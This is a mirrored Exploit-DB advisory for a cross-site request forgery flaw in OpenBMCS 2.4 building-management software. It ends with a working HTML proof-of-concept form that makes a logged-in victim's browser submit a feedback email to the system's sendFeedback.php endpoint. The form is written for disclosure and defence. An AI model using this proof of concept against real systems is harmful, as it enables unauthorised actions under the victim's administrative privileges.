OpenBMCS 2.4 – Cross Site Request Forgery (CSRF)

• Exploit Database
• 34 阅读

• 作者： LiquidWorm
  日期： 2022-01-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50667/

• # Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)
  # Exploit Author: LiquidWorm
  # Date: 26/10/2021
  
  OpenBMCS 2.4 CSRF Send E-mail
  
  
  Vendor: OPEN BMCS
  Product web page: https://www.openbmcs.com
  Affected version: 2.4
  
  Summary: Building Management & Controls System (BMCS). No matter what the
  size of your business, the OpenBMCS software has the ability to expand to
  hundreds of controllers. Our product can control and monitor anything from
  a garage door to a complete campus wide network, with everything you need
  on board.
  
  Desc: The application interface allows users to perform certain actions via
  HTTP requests without performing any validity checks to verify the requests.
  This can be exploited to perform certain actions with administrative privileges
  if a logged-in user visits a malicious web site.
  
  Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
   Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
   Apache/2.4.41 (Ubuntu)
   Apache/2.4.25 (Debian)
   nginx/1.16.1
   PHP/7.4.3
   PHP/7.0.33-0+deb9u9
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5691
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php
  
  
  26.10.2021
  
  --
  
  
  <html>
  <body>
  <form action="https://192.168.1.222/core/sendFeedback.php" method="POST">
  <input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
  <input type="hidden" name="message" value="Take me to your leader." />
  <input type="hidden" name="email" value="lab@zeroscience.mk" />
  <input type="submit" value="Send" />
  </form>
  </body>
  </html>